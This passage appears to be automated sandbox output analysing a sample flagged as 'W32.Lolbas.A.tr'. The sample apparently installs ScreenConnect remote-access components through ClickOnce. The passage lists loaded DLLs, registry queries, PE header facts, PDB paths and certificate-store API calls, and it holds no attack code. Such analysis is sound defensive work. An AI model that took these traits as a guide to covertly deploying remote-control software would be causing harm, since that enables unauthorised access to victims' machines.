                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb3 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.000000000134A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb a source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Core.pdbJt source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbH source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb4 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdbH source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B62000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4788000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1255423787.00000000009BD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nXC:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287827656.0000000001158000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: nect.Core.pdbpdk source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb{ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: mscorlib.pdbP source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbh source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: reenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbSystem.ni.dllSystem.Core.dll source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbta source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: @o.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4784000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289418244.00000000056A2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: %%.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb\ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA478C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: ?oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: Core.pdb/ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsFileManager.exe.1.drStatic PE information: 0xC9D5F63E [Wed Apr 21 14:57:02 2077 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: real checksum: 0x14df5 should be: 0x16eed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1BC0 push ecx; ret 0_2_003A1BD3
